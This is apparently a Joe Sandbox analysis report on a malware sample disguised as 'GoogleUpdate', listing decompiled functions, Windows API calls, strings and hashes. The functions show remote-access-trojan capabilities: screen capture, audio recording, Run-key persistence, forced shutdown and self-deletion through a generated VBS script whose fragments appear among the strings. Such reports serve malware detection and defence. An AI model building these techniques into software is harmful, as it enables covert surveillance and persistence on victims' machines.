                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$CloseFile$Exception@8FirstH_prologNextThrowsend
                                • String ID:
                                • API String ID: 3277409220-0
                                • Opcode ID: 534d6322ab01780cc4b5619258ebe056bbf8924c9103abb572c2cd789b0ad75b
                                • Instruction ID: 071b26812b5e49f88d0361c7bacc9152bfce797c8686ce15524b94070306fde2
                                • Opcode Fuzzy Hash: 534d6322ab01780cc4b5619258ebe056bbf8924c9103abb572c2cd789b0ad75b
                                • Instruction Fuzzy Hash: 4FB18D329001099BCB14FBA1CD92AEDB378AF50318F50416FE506B71E2EF785B49CB98
                                APIs
                                • FindFirstFileW.KERNEL32(00000000,?), ref: 00417D01
                                • FindNextFileW.KERNEL32(00000000,?,?), ref: 00417DCD
                                  • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040983B), ref: 0041A228
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Find$CreateFirstNext
                                • String ID: H"G$`'G$`'G
                                • API String ID: 341183262-2774397156
                                • Opcode ID: c3e5c594fd594ffbde7648241e1acae5dfb8bfc7b807ac84b70cab4847e33b49
                                • Instruction ID: cc65440c5fe1593426504ff8613f72b7370ef7481f3bf724e026da4e35a467e2
                                • Opcode Fuzzy Hash: c3e5c594fd594ffbde7648241e1acae5dfb8bfc7b807ac84b70cab4847e33b49
                                • Instruction Fuzzy Hash: 138183315083415BC314FB62C996DEFB7A8AF90304F40493FF586671E2EF789A49C69A
                                APIs
                                  • Part of subcall function 00415C90: GetCurrentProcess.KERNEL32(00000028,?), ref: 00415C9D
                                  • Part of subcall function 00415C90: OpenProcessToken.ADVAPI32(00000000), ref: 00415CA4
                                  • Part of subcall function 00415C90: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00415CB6
                                  • Part of subcall function 00415C90: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00415CD5
                                  • Part of subcall function 00415C90: GetLastError.KERNEL32 ref: 00415CDB
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00414E56
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00414E6B
                                • GetProcAddress.KERNEL32(00000000), ref: 00414E72
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-1420736420
                                • Opcode ID: 26b14eece71e4d13eaab4e965927ec332996d302ea5694147255bd3539dff505
                                • Instruction ID: 748c18e79ee5f9a1fbb6f05bd7ad52209f91b0004c4d1b0055552a3b76c5c1f9
                                • Opcode Fuzzy Hash: 26b14eece71e4d13eaab4e965927ec332996d302ea5694147255bd3539dff505
                                • Instruction Fuzzy Hash: 5F214F7070430157CE14FBB19896AAF6359AFD4349F40097FB5026B2D2EE7DCC4986AE
                                APIs
                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0044F6B5
                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 0044F6DE
                                • GetACP.KERNEL32 ref: 0044F6F3
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP
                                • API String ID: 2299586839-711371036
                                • Opcode ID: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                • Instruction ID: bf1e89585aec8fc6a823a5c6a63220f2d7696aba51182a9853130589b0d37fa4
                                • Opcode Fuzzy Hash: bf4880e5188eb12a7c294a6f25afa26b03a49e2ed1ffce5823e951fdb7c5b330
                                • Instruction Fuzzy Hash: 2221C122A00101A6F7348F24C901A9B73AAAF50B65F578577E809C7221FB36DD4BC398
                                APIs
                                • __EH_prolog.LIBCMT ref: 004087A5
                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040881D
                                • FindNextFileW.KERNEL32(00000000,?), ref: 00408846
                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040885D
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstH_prologNext
                                • String ID:
                                • API String ID: 1157919129-0
                                • Opcode ID: eff2ab803e63303553496c3eac6518fb39641dae111ed5945c7a25284e51344d
                                • Instruction ID: 37d480644902bd8bd77a9749fd647df5a3db5b19bbca398f696489d34b7b99bb
                                • Opcode Fuzzy Hash: eff2ab803e63303553496c3eac6518fb39641dae111ed5945c7a25284e51344d
                                • Instruction Fuzzy Hash: 12814D329001199BCB15EBA1DD929ED73B8AF54308F10427FE446B71E2EF385B49CB98
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 00445784
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 00445791
                                • GetUserDefaultLCID.KERNEL32 ref: 0044F8FC
                                • IsValidCodePage.KERNEL32(00000000), ref: 0044F957
                                • IsValidLocale.KERNEL32(?,00000001), ref: 0044F966
                                • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0044F9AE
                                • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0044F9CD
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                • String ID:
                                • API String ID: 745075371-0
                                • Opcode ID: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                • Instruction ID: 3a6be996f1d9ea25600d7609fa1d0555167a50dcc121ad64ff78238f3932635f
                                • Opcode Fuzzy Hash: b2004c1cc1df407676deb5a86971a5ed3ade22d67ad87857b151b1318ee5498f
                                • Instruction Fuzzy Hash: 0351A271900215AFFB20EFA5DC41BBF77B8AF08301F05447BE914EB251E7789A088769
                                APIs
                                • __EH_prolog.LIBCMT ref: 0040784D
                                • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407906
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040792E
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040793B
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407A51
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID:
                                • API String ID: 1771804793-0
                                • Opcode ID: 0c0ef18f2275b3e10c81759ed4882e8cdfc0df5b16c45a42bc3541e3cef5600d
                                • Instruction ID: 4b9324871479917b5af30c26e04a30266e6971a3e86a210f007197118c0b57fe
                                • Opcode Fuzzy Hash: 0c0ef18f2275b3e10c81759ed4882e8cdfc0df5b16c45a42bc3541e3cef5600d
                                • Instruction Fuzzy Hash: 18516372904208AACB04FBA1DD969DD7778AF11308F50417FB846771E2EF389B49CB99
                                APIs
                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041A861
                                  • Part of subcall function 0041215F: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 0041216E
                                  • Part of subcall function 0041215F: RegSetValueExA.KERNEL32(00000000,?,00000000,?,00000000,00000000,00000000,?,?,00412385,?,00000000), ref: 00412196
                                  • Part of subcall function 0041215F: RegCloseKey.ADVAPI32(00000000,?,?,00412385,?,00000000,?,?,?,?,0gj,00472248), ref: 004121A1
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseCreateInfoParametersSystemValue
                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                • API String ID: 4127273184-3576401099
                                • Opcode ID: f596ae5af9bf33204b26619baa0d18e1563d856132adf7f8c82eb4cc627f6b2d
                                • Instruction ID: 146807b905f8226e4159dba151db05d0611ea4827dca33b530162433be1e3f9d
                                • Opcode Fuzzy Hash: f596ae5af9bf33204b26619baa0d18e1563d856132adf7f8c82eb4cc627f6b2d
                                • Instruction Fuzzy Hash: 7C119671F8024037D514353A4D6BBAE18199343B50F54016BB6022B6CAF8EE4EA553DF
                                APIs
                                  • Part of subcall function 00445725: GetLastError.KERNEL32(00000020,?,00438595,?,?,?,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B), ref: 00445729
                                  • Part of subcall function 00445725: _free.LIBCMT ref: 0044575C
                                  • Part of subcall function 00445725: SetLastError.KERNEL32(00000000,00439FB1,?,?,00000020,00000000,?,?,?,0042BAB6,0000003B,?,00000041,00000000,00000000), ref: 0044579D
                                  • Part of subcall function 00445725: _abort.LIBCMT ref: 004457A3
                                • IsValidCodePage.KERNEL32(00000000), ref: 0044EF9A
                                • _wcschr.LIBVCRUNTIME ref: 0044F02A
                                • _wcschr.LIBVCRUNTIME ref: 0044F038
                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 0044F0DB
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                • String ID:
                                • API String ID: 4212172061-0
                                • Opcode ID: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
                                • Instruction ID: 651119c321e801f17dd1a7ba429a2dceeb4aa1bed9d5f8a21b6634afb1069130
                                • Opcode Fuzzy Hash: b042c09d22adbd0a465f75c66fe4c588d2498b30252692f7cd71b119f9e6cb68
                                • Instruction Fuzzy Hash: 8E61E935600606AAFB24AB36DC46BB773A8FF44714F14047FF905D7282EB78E9488769
                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00416E98
                                • CreateCompatibleDC.GDI32(00000000), ref: 00416EA5
                                  • Part of subcall function 004172DF: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 0041730F
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00416F1B
                                • DeleteDC.GDI32(00000000), ref: 00416F32
                                • DeleteDC.GDI32(00000000), ref: 00416F35
                                • DeleteObject.GDI32(00000000), ref: 00416F38
                                • SelectObject.GDI32(00000000,00000000), ref: 00416F59
                                • DeleteDC.GDI32(00000000), ref: 00416F6A
                                • DeleteDC.GDI32(00000000), ref: 00416F6D
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00416F91
                                • GetCursorInfo.USER32(?), ref: 00416FAF
                                • GetIconInfo.USER32(?,?), ref: 00416FC5
                                • DeleteObject.GDI32(?), ref: 00416FF4
                                • DeleteObject.GDI32(?), ref: 00417001
                                • DrawIcon.USER32(00000000,?,?,?), ref: 0041700E
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00417026
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 00417095
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00417104
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00417128
                                • DeleteDC.GDI32(?), ref: 0041713C
                                • DeleteDC.GDI32(00000000), ref: 0041713F
                                • DeleteObject.GDI32(00000000), ref: 00417142
                                • GlobalFree.KERNEL32(?), ref: 0041714D
                                • DeleteObject.GDI32(00000000), ref: 00417201
                                • GlobalFree.KERNEL32(?), ref: 00417208
                                • DeleteDC.GDI32(?), ref: 00417218
                                • DeleteDC.GDI32(00000000), ref: 00417223
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 4256916514-865373369
                                • Opcode ID: f009d80305bc9d5ab30ccb11e59cfdd7849c6e1eaeca7cb289485d8ed373fceb
                                • Instruction ID: 4ba325f74191387ade15767708145f982ef5b1c7ca4df498548f130554e7309d
                                • Opcode Fuzzy Hash: f009d80305bc9d5ab30ccb11e59cfdd7849c6e1eaeca7cb289485d8ed373fceb
                                • Instruction Fuzzy Hash: 6FB16A315083009FD720DF24DC44BABBBE9EF88755F41482EF98993291DB38E945CB5A
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000001,00000000,00472200,00471FFC,00000000), ref: 00410EF9
                                • ExitProcess.KERNEL32(00000000), ref: 00410F05
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00410F7F
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00410F8E
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00410F99
                                • CloseHandle.KERNEL32(00000000), ref: 00410FA0
                                • GetCurrentProcessId.KERNEL32 ref: 00410FA6
                                • PathFileExistsW.SHLWAPI(?), ref: 00410FD7
                                • GetTempPathW.KERNEL32(00000104,?), ref: 0041103A
                                • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 00411054
                                • lstrcatW.KERNEL32(?,.exe), ref: 00411066
                                  • Part of subcall function 0041A17B: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041A29A,00000000,00000000,?), ref: 0041A1BA
                                • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004110A6
                                • Sleep.KERNEL32(000001F4), ref: 004110E7
                                • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004110FC
                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00411107
                                • CloseHandle.KERNEL32(00000000), ref: 0041110E
                                • GetCurrentProcessId.KERNEL32 ref: 00411114
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                • String ID: (#G$.exe$H"G$WDH$exepath$open$temp_
                                • API String ID: 2649220323-71629269
                                • Opcode ID: eb248e324986b9b20c29ddac23cd87ea41ec1774206ead678826a737cf292c16
                                • Instruction ID: 69aa2ac3f34532c799e46254488c9bc95b38e37df126af38d98eea17990f3aaa
                                • Opcode Fuzzy Hash: eb248e324986b9b20c29ddac23cd87ea41ec1774206ead678826a737cf292c16
                                • Instruction Fuzzy Hash: 9D51A671A003196BDF10A7A09C59EEE336D9B04715F5041BBF605A31E2EFBC8E86875D
                                APIs
                                  • Part of subcall function 004112B5: TerminateProcess.KERNEL32(00000000,0gj,0040E2B2), ref: 004112C5
                                  • Part of subcall function 004112B5: WaitForSingleObject.KERNEL32(000000FF), ref: 004112D8
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,00472200,pth_unenc,0gj), ref: 0040BD63
                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040BD76
                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,00472200,pth_unenc,0gj), ref: 0040BDA6
                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00472200,pth_unenc,0gj), ref: 0040BDB5
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(Function_00009305,00000000,0gj,0040BC76,?,00472200,pth_unenc,0gj), ref: 0040A801
                                  • Part of subcall function 0040A7F2: UnhookWindowsHookEx.USER32(000404CB), ref: 0040A811
                                  • Part of subcall function 0040A7F2: TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,0gj), ref: 0040A823
                                  • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,6C4E8300,00000000,?,?,?,?,00469654,0040BDCB,.vbs,?,?,?,?,?,00472200), ref: 00419980
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BFD0
                                • ExitProcess.KERNEL32 ref: 0040BFD7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                • String ID: ")$.vbs$0gj$H"G$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                • API String ID: 3797177996-2736686755
                                • Opcode ID: d44cd6c1543e68157222bd881e797b0f0dc11d1c81d48e1fe2873650623bca29
                                • Instruction ID: 6c8f8b33712d81dc7036d24bc004af62d002185c7e194acf753e7914dc64dab3
                                • Opcode Fuzzy Hash: d44cd6c1543e68157222bd881e797b0f0dc11d1c81d48e1fe2873650623bca29
                                • Instruction Fuzzy Hash: DD816E716042405AC714FB62D8929EF77A8AF90708F10443FF586A71E2EF789E49C69E
                                APIs
                                • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AB9
                                • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401AE3
                                • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401AF3
                                • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B03
                                • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B13
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B23
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B34
                                • WriteFile.KERNEL32(00000000,0046FA9A,00000002,00000000,00000000), ref: 00401B45
                                • WriteFile.KERNEL32(00000000,0046FA9C,00000004,00000000,00000000), ref: 00401B55
                                • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B65
                                • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B76
                                • WriteFile.KERNEL32(00000000,0046FAA6,00000002,00000000,00000000), ref: 00401B87
                                • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401B97
                                • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BA7
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Write$Create
                                • String ID: RIFF$WAVE$data$fmt
                                • API String ID: 1602526932-4212202414
                                • Opcode ID: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                • Instruction ID: fa9573d22dfebaa7cc70b9682dc8642ba3498ee27ac2ec60dc87a96e6c13d219
                                • Opcode Fuzzy Hash: e953cdad80a2b5f15463d19f06cbbe214ca4708b9acf4e214683fef01c63ba87
                                • Instruction Fuzzy Hash: 46416F726543197AE210DB91DD85FBB7EECEB85B50F40042AF648D6080E7A4E909DBB3
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
